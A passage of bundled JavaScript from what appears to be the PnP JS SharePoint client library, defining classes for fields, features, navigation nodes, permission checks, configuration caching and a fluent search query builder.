"X-HTTP-Method": "MERGE", }, }).then(function (data) { return { action: _this, data: data, }; }); }; /** * Removes this user custom action * */ UserCustomAction.prototype.delete = function () { return _super.prototype.delete.call(this); }; return UserCustomAction; }(queryable_1.QueryableInstance)); exports.UserCustomAction = UserCustomAction; /***/ }), /* 20 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true 
}); var storage = __webpack_require__(14); var exceptions_1 = __webpack_require__(3); /** * A caching provider which can wrap other non-caching providers * */ var CachingConfigurationProvider = (function () { /** * Creates a new caching configuration provider * @constructor * @param {IConfigurationProvider} wrappedProvider Provider which will be used to fetch the configuration * @param {string} cacheKey Key that will be used to store cached items to the cache * @param {IPnPClientStore} cacheStore OPTIONAL storage, which will be used to store cached settings. */ function CachingConfigurationProvider(wrappedProvider, cacheKey, cacheStore) { this.wrappedProvider = wrappedProvider; this.store = (cacheStore) ? cacheStore : this.selectPnPCache(); this.cacheKey = "_configcache_" + cacheKey; } /** * Gets the wrapped configuration providers * * @return {IConfigurationProvider} Wrapped configuration provider */ CachingConfigurationProvider.prototype.getWrappedProvider = function () { return this.wrappedProvider; }; /** * Loads the configuration values either from the cache or from the wrapped provider * * @return {Promise<TypedHash<string>>} Promise of loaded configuration values */ CachingConfigurationProvider.prototype.getConfiguration = function () { var _this = this; // Cache not available, pass control to the wrapped provider if ((!this.store) || (!this.store.enabled)) { return this.wrappedProvider.getConfiguration(); } // Value is found in cache, return it directly var cachedConfig = this.store.get(this.cacheKey); if (cachedConfig) { return new Promise(function (resolve) { resolve(cachedConfig); }); } // Get and cache value from the wrapped provider var providerPromise = this.wrappedProvider.getConfiguration(); providerPromise.then(function (providedConfig) { _this.store.put(_this.cacheKey, providedConfig); }); return providerPromise; }; CachingConfigurationProvider.prototype.selectPnPCache = function () { var pnpCache = new storage.PnPClientStorage(); if ((pnpCache.local) && (pnpCache.local.enabled)) { return pnpCache.local; } if ((pnpCache.session) && (pnpCache.session.enabled)) { return pnpCache.session; } throw new exceptions_1.NoCacheAvailableException(); }; return CachingConfigurationProvider; }()); exports.default = CachingConfigurationProvider; /***/ }), /* 21 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; /* WEBPACK VAR INJECTION */(function(global) { Object.defineProperty(exports, "__esModule", { value: true }); /** * Makes requests using the fetch API */ var FetchClient = (function () { function FetchClient() { } FetchClient.prototype.fetch = function (url, options) { return global.fetch(url, options); }; return FetchClient; }()); exports.FetchClient = FetchClient; /* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(32))) /***/ }), /* 22 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var storage_1 = __webpack_require__(14); var util_1 = __webpack_require__(0); var pnplibconfig_1 = __webpack_require__(4); var CachingOptions = (function () { function CachingOptions(key) { this.key = key; this.expiration = util_1.Util.dateAdd(new Date(), "second", pnplibconfig_1.RuntimeConfig.defaultCachingTimeoutSeconds); this.storeName = pnplibconfig_1.RuntimeConfig.defaultCachingStore; } Object.defineProperty(CachingOptions.prototype, "store", { get: function () { if (this.storeName === "local") { return CachingOptions.storage.local; } else { return 
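/* [Editor's usage sketch; not part of the bundled source.] Wrapping any
 * IConfigurationProvider in the caching provider defined above;
 * settingsProvider is an assumed stand-in for a concrete provider:
 *
 *   var cached = new CachingConfigurationProvider(settingsProvider, "site-settings");
 *   cached.getConfiguration().then(function (config) { console.log(config); });
 *
 * The first call hits the wrapped provider and stores the result under
 * "_configcache_site-settings"; later calls resolve straight from local or
 * session storage until the entry expires.
 */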
CachingOptions.storage.session; } }, enumerable: true, configurable: true }); return CachingOptions; }()); CachingOptions.storage = new storage_1.PnPClientStorage(); exports.CachingOptions = CachingOptions; var CachingParserWrapper = (function () { function CachingParserWrapper(_parser, _cacheOptions) { this._parser = _parser; this._cacheOptions = _cacheOptions; } CachingParserWrapper.prototype.parse = function (response) { var _this = this; // add this to the cache based on the options return this._parser.parse(response).then(function (data) { if (_this._cacheOptions.store !== null) { _this._cacheOptions.store.put(_this._cacheOptions.key, data, _this._cacheOptions.expiration); } return data; }); }; return CachingParserWrapper; }()); exports.CachingParserWrapper = CachingParserWrapper; /***/ }), /* 23 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); /** * Describes a collection of Feature objects * */ var Features = (function (_super) { __extends(Features, _super); /** * Creates a new instance of the Features class * * @param baseUrl The url or Queryable which forms the parent of this features collection */ function Features(baseUrl, path) { if (path === void 0) { path = "features"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a feature from the collection by GUID id * * @param id The Id of the feature (GUID) */ Features.prototype.getById = function (id) { var feature = new Feature(this); feature.concat("('" + id + "')"); return feature; }; /** * Adds (activates) a feature to the collection * * @param id The Id of the feature (GUID) * @param force If true the feature activation will be forced */ Features.prototype.add = function (id, force) { var _this = this; if (force === void 0) { force = false; } return this.clone(Features, "add", true).post({ body: JSON.stringify({ featdefScope: 0, featureId: id, force: force, }), }).then(function (data) { return { data: data, feature: _this.getById(id), }; }); }; /** * Removes (deactivates) a feature from the collection * * @param id The Id of the feature (GUID) * @param force If true the feature deactivation will be forced */ Features.prototype.remove = function (id, force) { if (force === void 0) { force = false; } return this.clone(Features, "remove", true).post({ body: JSON.stringify({ featureId: id, force: force, }), }); }; return Features; }(queryable_1.QueryableCollection)); exports.Features = Features; var Feature = (function (_super) { __extends(Feature, _super); function Feature() { return _super !== null && _super.apply(this, arguments) || this; } /** * Deactivates this feature * * @param force If true the feature deactivation will be forced */ Feature.prototype.deactivate = function (force) { var _this = this; if (force === void 0) { force = false; } var removeDependency = this.addBatchDependency(); var idGet = new Feature(this).select("DefinitionId"); return idGet.getAs().then(function (feature) { var promise = _this.getParent(Features, _this.parentUrl,
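/* [Editor's usage sketch; not part of the bundled source.] Activating and
 * then deactivating a web-scoped feature with the collection above; the
 * GUID is illustrative and pnp is the assumed public entry point:
 *
 *   var featureId = "87294c72-f260-42f3-a41b-981a2ffce37a";
 *   pnp.sp.web.features.add(featureId, true)
 *       .then(function (res) { return res.feature.get(); })
 *       .then(function () { return pnp.sp.web.features.remove(featureId, true); });
 */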
"", _this.batch).remove(feature.DefinitionId, force); removeDependency(); return promise; }); }; return Feature; }(queryable_1.QueryableInstance)); exports.Feature = Feature; /***/ }), /* 24 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); var types_1 = __webpack_require__(13); /** * Describes a collection of Field objects * */ var Fields = (function (_super) { __extends(Fields, _super); /** * Creates a new instance of the Fields class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Fields(baseUrl, path) { if (path === void 0) { path = "fields"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a field from the collection by title * * @param title The case-sensitive title of the field */ Fields.prototype.getByTitle = function (title) { return new Field(this, "getByTitle('" + title + "')"); }; /** * Gets a field from the collection by using internal name or title * * @param name The case-sensitive internal name or title of the field */ Fields.prototype.getByInternalNameOrTitle = function (name) { return new Field(this, "getByInternalNameOrTitle('" + name + "')"); }; /** * Gets a list from the collection by guid id * * @param title The Id of the list */ Fields.prototype.getById = function (id) { var f = new Field(this); f.concat("('" + id + "')"); return f; }; /** * Creates a field based on the specified schema */ Fields.prototype.createFieldAsXml = function (xml) { var _this = this; var info; if (typeof xml === "string") { info = { SchemaXml: xml }; } else { info = xml; } var postBody = JSON.stringify({ "parameters": util_1.Util.extend({ "__metadata": { "type": "SP.XmlSchemaFieldCreationInformation", }, }, info), }); return this.clone(Fields, "createfieldasxml", true).postAs({ body: postBody }).then(function (data) { return { data: data, field: _this.getById(data.Id), }; }); }; /** * Adds a new list to the collection * * @param title The new field's title * @param fieldType The new field's type (ex: SP.FieldText) * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.add = function (title, fieldType, properties) { var _this = this; if (properties === void 0) { properties = {}; } var postBody = JSON.stringify(util_1.Util.extend({ "Title": title, "__metadata": { "type": fieldType }, }, properties)); return this.clone(Fields, null, true).postAs({ body: postBody }).then(function (data) { return { data: data, field: _this.getById(data.Id), }; }); }; /** * Adds a new SP.FieldText to the collection * * @param title The field title * @param maxLength The maximum number of characters allowed in the value of the field. 
* @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addText = function (title, maxLength, properties) { if (maxLength === void 0) { maxLength = 255; } var props = { FieldTypeKind: 2, MaxLength: maxLength, }; return this.add(title, "SP.FieldText", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldCalculated to the collection * * @param title The field title. * @param formula The formula for the field. * @param dateFormat The date and time format that is displayed in the field. * @param outputType Specifies the output format for the field. Represents a FieldType value. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addCalculated = function (title, formula, dateFormat, outputType, properties) { if (outputType === void 0) { outputType = types_1.FieldTypes.Text; } var props = { DateFormat: dateFormat, FieldTypeKind: 17, Formula: formula, OutputType: outputType, }; return this.add(title, "SP.FieldCalculated", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldDateTime to the collection * * @param title The field title * @param displayFormat The format of the date and time that is displayed in the field. * @param calendarType Specifies the calendar type of the field. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addDateTime = function (title, displayFormat, calendarType, friendlyDisplayFormat, properties) { if (displayFormat === void 0) { displayFormat = types_1.DateTimeFieldFormatType.DateOnly; } if (calendarType === void 0) { calendarType = types_1.CalendarType.Gregorian; } if (friendlyDisplayFormat === void 0) { friendlyDisplayFormat = 0; } var props = { DateTimeCalendarType: calendarType, DisplayFormat: displayFormat, FieldTypeKind: 4, FriendlyDisplayFormat: friendlyDisplayFormat, }; return this.add(title, "SP.FieldDateTime", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldNumber to the collection * * @param title The field title * @param minValue The field's minimum value * @param maxValue The field's maximum value * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addNumber = function (title, minValue, maxValue, properties) { var props = { FieldTypeKind: 9 }; if (typeof minValue !== "undefined") { props = util_1.Util.extend({ MinimumValue: minValue }, props); } if (typeof maxValue !== "undefined") { props = util_1.Util.extend({ MaximumValue: maxValue }, props); } return this.add(title, "SP.FieldNumber", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldCurrency to the collection * * @param title The field title * @param minValue The field's minimum value * @param maxValue The field's maximum value * @param currencyLocalId Specifies the language code identifier (LCID) used to format the value of the field * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addCurrency = function (title, minValue, maxValue, currencyLocalId, properties) { if (currencyLocalId === void 0) { currencyLocalId = 1033; } var props = { CurrencyLocaleId: currencyLocalId, FieldTypeKind: 10, }; if (typeof minValue !== "undefined") { props = util_1.Util.extend({ 
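/* [Editor's usage sketch; not part of the bundled source.] The typed
 * helpers above wrap Fields.add with the matching FieldTypeKind; the list
 * and field names are illustrative and pnp is the assumed public entry
 * point:
 *
 *   var fields = pnp.sp.web.lists.getByTitle("Tasks").fields;
 *   fields.addText("CustomerName", 100)
 *       .then(function () { return fields.addNumber("Hours", 0, 24); })
 *       .then(function (res) { console.log(res.data); });
 */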
MinimumValue: minValue }, props); } if (typeof maxValue !== "undefined") { props = util_1.Util.extend({ MaximumValue: maxValue }, props); } return this.add(title, "SP.FieldCurrency", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldMultiLineText to the collection * * @param title The field title * @param numberOfLines Specifies the number of lines of text to display for the field. * @param richText Specifies whether the field supports rich formatting. * @param restrictedMode Specifies whether the field supports a subset of rich formatting. * @param appendOnly Specifies whether all changes to the value of the field are displayed in list forms. * @param allowHyperlink Specifies whether a hyperlink is allowed as a value of the field. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) * */ Fields.prototype.addMultilineText = function (title, numberOfLines, richText, restrictedMode, appendOnly, allowHyperlink, properties) { if (numberOfLines === void 0) { numberOfLines = 6; } if (richText === void 0) { richText = true; } if (restrictedMode === void 0) { restrictedMode = false; } if (appendOnly === void 0) { appendOnly = false; } if (allowHyperlink === void 0) { allowHyperlink = true; } var props = { AllowHyperlink: allowHyperlink, AppendOnly: appendOnly, FieldTypeKind: 3, NumberOfLines: numberOfLines, RestrictedMode: restrictedMode, RichText: richText, }; return this.add(title, "SP.FieldMultiLineText", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldUrl to the collection * * @param title The field title */ Fields.prototype.addUrl = function (title, displayFormat, properties) { if (displayFormat === void 0) { displayFormat = types_1.UrlFieldFormatType.Hyperlink; } var props = { DisplayFormat: displayFormat, FieldTypeKind: 11, }; return this.add(title, "SP.FieldUrl", util_1.Util.extend(props, properties)); }; return Fields; }(queryable_1.QueryableCollection)); exports.Fields = Fields; /** * Describes a single of Field instance * */ var Field = (function (_super) { __extends(Field, _super); function Field() { return _super !== null && _super.apply(this, arguments) || this; } /** * Updates this field intance with the supplied properties * * @param properties A plain object hash of values to update for the list * @param fieldType The type value, required to update child field type properties */ Field.prototype.update = function (properties, fieldType) { var _this = this; if (fieldType === void 0) { fieldType = "SP.Field"; } var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": fieldType }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, field: _this, }; }); }; /** * Delete this fields * */ Field.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; /** * Sets the value of the ShowInDisplayForm property for this field. */ Field.prototype.setShowInDisplayForm = function (show) { return this.clone(Field, "setshowindisplayform(" + show + ")", true).post(); }; /** * Sets the value of the ShowInEditForm property for this field. */ Field.prototype.setShowInEditForm = function (show) { return this.clone(Field, "setshowineditform(" + show + ")", true).post(); }; /** * Sets the value of the ShowInNewForm property for this field. 
*/ Field.prototype.setShowInNewForm = function (show) { return this.clone(Field, "setshowinnewform(" + show + ")", true).post(); }; return Field; }(queryable_1.QueryableInstance)); exports.Field = Field; /***/ }), /* 25 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var queryable_1 = __webpack_require__(1); /** * Represents a collection of navigation nodes * */ var NavigationNodes = (function (_super) { __extends(NavigationNodes, _super); function NavigationNodes() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a navigation node by id * * @param id The id of the node */ NavigationNodes.prototype.getById = function (id) { var node = new NavigationNode(this); node.concat("(" + id + ")"); return node; }; /** * Adds a new node to the collection * * @param title Display name of the node * @param url The url of the node * @param visible If true the node is visible, otherwise it is hidden (default: true) */ NavigationNodes.prototype.add = function (title, url, visible) { var _this = this; if (visible === void 0) { visible = true; } var postBody = JSON.stringify({ IsVisible: visible, Title: title, Url: url, "__metadata": { "type": "SP.NavigationNode" }, }); return this.clone(NavigationNodes, null, true).post({ body: postBody }).then(function (data) { return { data: data, node: _this.getById(data.Id), }; }); }; /** * Moves a node to be after another node in the navigation * * @param nodeId Id of the node to move * @param previousNodeId Id of the node after which we move the node specified by nodeId */ NavigationNodes.prototype.moveAfter = function (nodeId, previousNodeId) { var postBody = JSON.stringify({ nodeId: nodeId, previousNodeId: previousNodeId, }); return this.clone(NavigationNodes, "MoveAfter", true).post({ body: postBody }); }; return NavigationNodes; }(queryable_1.QueryableCollection)); exports.NavigationNodes = NavigationNodes; var NavigationNode = (function (_super) { __extends(NavigationNode, _super); function NavigationNode() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(NavigationNode.prototype, "children", { /** * Represents the child nodes of this node */ get: function () { return new NavigationNodes(this, "Children"); }, enumerable: true, configurable: true }); /** * Updates this node based on the supplied properties * * @param properties The hash of key/value pairs to update */ NavigationNode.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.NavigationNode" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, node: _this, }; }); }; /** * Deletes this node and any child nodes */ NavigationNode.prototype.delete = function () { return _super.prototype.delete.call(this); }; return NavigationNode; }(queryable_1.QueryableInstance)); exports.NavigationNode = NavigationNode; /** 
* Exposes the navigation components * */ var Navigation = (function (_super) { __extends(Navigation, _super); /** * Creates a new instance of the Lists class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Navigation(baseUrl, path) { if (path === void 0) { path = "navigation"; } return _super.call(this, baseUrl, path) || this; } Object.defineProperty(Navigation.prototype, "quicklaunch", { /** * Gets the quicklaunch navigation for the current context * */ get: function () { return new NavigationNodes(this, "quicklaunch"); }, enumerable: true, configurable: true }); Object.defineProperty(Navigation.prototype, "topNavigationBar", { /** * Gets the top bar navigation navigation for the current context * */ get: function () { return new NavigationNodes(this, "topnavigationbar"); }, enumerable: true, configurable: true }); return Navigation; }(queryable_1.Queryable)); exports.Navigation = Navigation; /***/ }), /* 26 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var webs_1 = __webpack_require__(8); var roles_1 = __webpack_require__(17); var types_1 = __webpack_require__(13); var queryable_1 = __webpack_require__(1); var QueryableSecurable = (function (_super) { __extends(QueryableSecurable, _super); function QueryableSecurable() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(QueryableSecurable.prototype, "roleAssignments", { /** * Gets the set of role assignments for this item * */ get: function () { return new roles_1.RoleAssignments(this); }, enumerable: true, configurable: true }); Object.defineProperty(QueryableSecurable.prototype, "firstUniqueAncestorSecurableObject", { /** * Gets the closest securable up the security hierarchy whose permissions are applied to this list item * */ get: function () { return new queryable_1.QueryableInstance(this, "FirstUniqueAncestorSecurableObject"); }, enumerable: true, configurable: true }); /** * Gets the effective permissions for the user supplied * * @param loginName The claims username for the user (ex: i:0#.f|membership|[email protected]) */ QueryableSecurable.prototype.getUserEffectivePermissions = function (loginName) { var q = this.clone(queryable_1.Queryable, "getUserEffectivePermissions(@user)", true); q.query.add("@user", "'" + encodeURIComponent(loginName) + "'"); return q.getAs(); }; /** * Gets the effective permissions for the current user */ QueryableSecurable.prototype.getCurrentUserEffectivePermissions = function () { var _this = this; var w = webs_1.Web.fromUrl(this.toUrl()); return w.currentUser.select("LoginName").getAs().then(function (user) { return _this.getUserEffectivePermissions(user.LoginName); }); }; /** * Breaks the security inheritance at this level optinally copying permissions and clearing subscopes * * @param copyRoleAssignments If true the permissions are copied from the current parent scope * @param clearSubscopes Optional. 
true to make all child securable objects inherit role assignments from the current object */ QueryableSecurable.prototype.breakRoleInheritance = function (copyRoleAssignments, clearSubscopes) { if (copyRoleAssignments === void 0) { copyRoleAssignments = false; } if (clearSubscopes === void 0) { clearSubscopes = false; } return this.clone(QueryableSecurable, "breakroleinheritance(copyroleassignments=" + copyRoleAssignments + ", clearsubscopes=" + clearSubscopes + ")", true).post(); }; /** * Removes the local role assignments so that it re-inherit role assignments from the parent object. * */ QueryableSecurable.prototype.resetRoleInheritance = function () { return this.clone(QueryableSecurable, "resetroleinheritance", true).post(); }; /** * Determines if a given user has the appropriate permissions * * @param loginName The user to check * @param permission The permission being checked */ QueryableSecurable.prototype.userHasPermissions = function (loginName, permission) { var _this = this; return this.getUserEffectivePermissions(loginName).then(function (perms) { return _this.hasPermissions(perms, permission); }); }; /** * Determines if the current user has the requested permissions * * @param permission The permission we wish to check */ QueryableSecurable.prototype.currentUserHasPermissions = function (permission) { var _this = this; return this.getCurrentUserEffectivePermissions().then(function (perms) { return _this.hasPermissions(perms, permission); }); }; /** * Taken from sp.js, checks the supplied permissions against the mask * * @param value The security principal's permissions on the given object * @param perm The permission checked against the value */ /* tslint:disable:no-bitwise */ QueryableSecurable.prototype.hasPermissions = function (value, perm) { if (!perm) { return true; } if (perm === types_1.PermissionKind.FullMask) { return (value.High & 32767) === 32767 && value.Low === 65535; } perm = perm - 1; var num = 1; if (perm >= 0 && perm < 32) { num = num << perm; return 0 !== (value.Low & num); } else if (perm >= 32 && perm < 64) { num = num << perm - 32; return 0 !== (value.High & num); } return false; }; return QueryableSecurable; }(queryable_1.QueryableInstance)); exports.QueryableSecurable = QueryableSecurable; /***/ }), /* 27 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
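/* [Editor's worked example for hasPermissions above; not part of the
 * bundled source.] Effective permissions arrive as a 64-bit mask split into
 * { High, Low } dwords. For PermissionKind.ManageWeb (31): perm - 1 = 30,
 * so the test is (value.Low & (1 << 30)) !== 0. For
 * PermissionKind.EnumeratePermissions (63): perm - 1 = 62 >= 32, so the
 * test moves to the high dword: (value.High & (1 << (62 - 32))) !== 0.
 * FullMask (65) is special-cased as (High & 0x7FFF) === 0x7FFF and
 * Low === 0xFFFF, matching the sp.js implementation this was taken from.
 */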
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); /** * Allows for the fluent construction of search queries */ var SearchQueryBuilder = (function () { function SearchQueryBuilder(queryText, _query) { if (queryText === void 0) { queryText = ""; } if (_query === void 0) { _query = {}; } this._query = _query; if (typeof queryText === "string" && queryText.length > 0) { this.extendQuery({ Querytext: queryText }); } } SearchQueryBuilder.create = function (queryText, queryTemplate) { if (queryText === void 0) { queryText = ""; } if (queryTemplate === void 0) { queryTemplate = {}; } return new SearchQueryBuilder(queryText, queryTemplate); }; SearchQueryBuilder.prototype.text = function (queryText) { return this.extendQuery({ Querytext: queryText }); }; SearchQueryBuilder.prototype.template = function (template) { return this.extendQuery({ QueryTemplate: template }); }; SearchQueryBuilder.prototype.sourceId = function (id) { return this.extendQuery({ SourceId: id }); }; Object.defineProperty(SearchQueryBuilder.prototype, "enableInterleaving", { get: function () { return this.extendQuery({ EnableInterleaving: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableStemming", { get: function () { return this.extendQuery({ EnableStemming: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "trimDuplicates", { get: function () { return this.extendQuery({ TrimDuplicates: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableNicknames", { get: function () { return this.extendQuery({ EnableNicknames: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableFql", { get: function () { return this.extendQuery({ EnableFql: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enablePhonetic", { get: function () { return this.extendQuery({ EnablePhonetic: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "bypassResultTypes", { get: function () { return this.extendQuery({ BypassResultTypes: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "processBestBets", { get: function () { return this.extendQuery({ ProcessBestBets: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableQueryRules", { get: function () { return this.extendQuery({ EnableQueryRules: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "enableSorting", { get: function () { return this.extendQuery({ EnableSorting: true }); }, enumerable: true, configurable: true }); Object.defineProperty(SearchQueryBuilder.prototype, "generateBlockRankLog", { get: function () { return this.extendQuery({ GenerateBlockRankLog: true }); }, enumerable: true, configurable: true }); SearchQueryBuilder.prototype.rankingModelId = function (id) { return this.extendQuery({ RankingModelId: id }); }; SearchQueryBuilder.prototype.startRow = function (id) { return this.extendQuery({ StartRow: id }); }; SearchQueryBuilder.prototype.rowLimit = function (id) { return this.extendQuery({ RowLimit: id }); }; 
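// --- Illustrative usage sketch (a hypothetical helper, not part of the library; it is declared here but never invoked) ---
// Each builder member above merges a single property into the underlying SearchQuery via extendQuery and returns the
// builder, so calls chain fluently. Note that the boolean flags (enableStemming, trimDuplicates, ...) are defined as
// getters, so they chain without parentheses; toSearchQuery (defined further below) unwraps the plain query object.
function exampleBuildSearchQuery() {
    return SearchQueryBuilder.create("contoso")
        .startRow(0)
        .rowLimit(10)
        .enableStemming
        .toSearchQuery();
}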
SearchQueryBuilder.prototype.rowsPerPage = function (id) { return this.extendQuery({ RowsPerPage: id }); }; SearchQueryBuilder.prototype.selectProperties = function () { var properties = []; for (var _i = 0; _i < arguments.length; _i++) { properties[_i] = arguments[_i]; } return this.extendQuery({ SelectProperties: properties }); }; SearchQueryBuilder.prototype.culture = function (culture) { return this.extendQuery({ Culture: culture }); }; SearchQueryBuilder.prototype.refinementFilters = function () { var filters = []; for (var _i = 0; _i < arguments.length; _i++) { filters[_i] = arguments[_i]; } return this.extendQuery({ RefinementFilters: filters }); }; SearchQueryBuilder.prototype.refiners = function (refiners) { return this.extendQuery({ Refiners: refiners }); }; SearchQueryBuilder.prototype.hiddenConstraints = function (constraints) { return this.extendQuery({ HiddenConstraints: constraints }); }; SearchQueryBuilder.prototype.sortList = function () { var sorts = []; for (var _i = 0; _i < arguments.length; _i++) { sorts[_i] = arguments[_i]; } return this.extendQuery({ SortList: sorts }); }; SearchQueryBuilder.prototype.timeout = function (milliseconds) { return this.extendQuery({ Timeout: milliseconds }); }; SearchQueryBuilder.prototype.hithighlightedProperties = function () { var properties = []; for (var _i = 0; _i < arguments.length; _i++) { properties[_i] = arguments[_i]; } return this.extendQuery({ HithighlightedProperties: properties }); }; SearchQueryBuilder.prototype.clientType = function (clientType) { return this.extendQuery({ ClientType: clientType }); }; SearchQueryBuilder.prototype.personalizationData = function (data) { return this.extendQuery({ PersonalizationData: data }); }; SearchQueryBuilder.prototype.resultsURL = function (url) { return this.extendQuery({ ResultsURL: url }); }; SearchQueryBuilder.prototype.queryTag = function () { var tags = []; for (var _i = 0; _i < arguments.length; _i++) { tags[_i] = arguments[_i]; } return this.extendQuery({ QueryTag: tags }); }; SearchQueryBuilder.prototype.properties = function () { var properties = []; for (var _i = 0; _i < arguments.length; _i++) { properties[_i] = arguments[_i]; } return this.extendQuery({ Properties: properties }); }; Object.defineProperty(SearchQueryBuilder.prototype, "processPersonalFavorites", { get: function () { return this.extendQuery({ ProcessPersonalFavorites: true }); }, enumerable: true, configurable: true }); SearchQueryBuilder.prototype.queryTemplatePropertiesUrl = function (url) { return this.extendQuery({ QueryTemplatePropertiesUrl: url }); }; SearchQueryBuilder.prototype.reorderingRules = function () { var rules = []; for (var _i = 0; _i < arguments.length; _i++) { rules[_i] = arguments[_i]; } return this.extendQuery({ ReorderingRules: rules }); }; SearchQueryBuilder.prototype.hitHighlightedMultivaluePropertyLimit = function (limit) { return this.extendQuery({ HitHighlightedMultivaluePropertyLimit: limit }); }; Object.defineProperty(SearchQueryBuilder.prototype, "enableOrderingHitHighlightedProperty", { get: function () { return this.extendQuery({ EnableOrderingHitHighlightedProperty: true }); }, enumerable: true, configurable: true }); SearchQueryBuilder.prototype.collapseSpecification = function (spec) { return this.extendQuery({ CollapseSpecification: spec }); }; SearchQueryBuilder.prototype.uiLanguage = function (lang) { return this.extendQuery({ UIlanguage: lang }); }; SearchQueryBuilder.prototype.desiredSnippetLength = function (len) { return this.extendQuery({ DesiredSnippetLength: 
